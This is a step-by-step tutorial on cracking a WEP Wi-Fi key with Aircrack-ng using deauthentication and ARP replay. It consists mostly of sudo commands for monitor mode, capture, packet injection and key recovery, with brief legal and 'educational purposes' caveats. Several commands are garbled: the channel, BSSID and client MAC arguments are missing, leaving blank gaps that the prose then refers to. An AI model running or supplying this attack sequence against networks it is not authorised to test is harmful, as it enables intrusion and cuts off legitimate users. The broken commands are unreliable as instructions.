WEP Cracking with Aircrack-ng: ARP Replay

TL;DR

This guide shows you how to crack a WEP key using ARP replay attacks within the Aircrack-ng suite. It’s an older method, but useful for understanding WEP vulnerabilities and practicing cyber security skills in a controlled environment.

Prerequisites

• A wireless network interface card (NIC) that supports monitor mode and packet injection.
• The Aircrack-ng suite installed on your Linux system (Kali Linux is recommended).
• Root privileges (sudo access).
• A target WEP network. Important: Only test this on networks you own or have explicit permission to assess.

Steps

1. Put your wireless interface into monitor mode. This allows it to capture all wireless traffic, not just packets addressed to it.

   sudo airmon-ng start wlan0

   This will usually create a new interface like wlan0mon. Use this interface for the following steps.

2. Identify your target network. Use Airodump-ng to scan for nearby wireless networks and find the BSSID (MAC address) of your target WEP network.

   sudo airodump-ng wlan0mon

   Note down the BSSID, channel number, and ESSID (network name).

3. Capture traffic on the target network. Airodump-ng will capture packets from the specified channel.

   sudo airodump-ng -c  --bssid  wlan0mon -w capture

   Replace <channel_number> and <BSSID> with the values you noted in step 2. The -w capture option saves the captured packets to files starting with ‘capture’.

4. Deauthenticate a client (optional, but speeds up the process). Sending deauthentication packets forces clients to reconnect, generating more traffic.

   sudo aireplay-ng -0 1 -a  -c  wlan0mon

   Replace <BSSID> with the target network’s BSSID and <client_MAC_address> with a client connected to that network (found in Airodump-ng output). Repeat this several times.

5. Perform an ARP replay attack. This sends spoofed ARP requests, generating more IVs (Initialisation Vectors) which are needed for cracking the key.

   sudo aireplay-ng -3 -b  -h  wlan0mon

   Replace <BSSID> with the target network’s BSSID and <client_MAC_address> with a client MAC address. Let this run for several minutes, or until you have enough IVs (at least 20,000-50,000 is recommended).

6. Crack the WEP key. Use Aircrack-ng to attempt to crack the captured packets.

   sudo aircrack-ng capture*.cap

   Aircrack-ng will analyze the .cap files and attempt to recover the WEP key. If successful, it will display the key in various formats (hexadecimal, ASCII).

7. Stop monitor mode. Once you’ve finished capturing traffic.

   sudo airmon-ng stop wlan0mon

Important Considerations

• Legal implications: Cracking WEP keys without permission is illegal. This guide is for educational purposes only.
• WEP is outdated: WEP is very insecure and easily cracked. Modern networks should use WPA2 or WPA3 encryption.
• IVs are key: The more IVs you capture, the higher your chances of successfully cracking the key.
• Client activity: More active clients on the network will generate more traffic and IVs.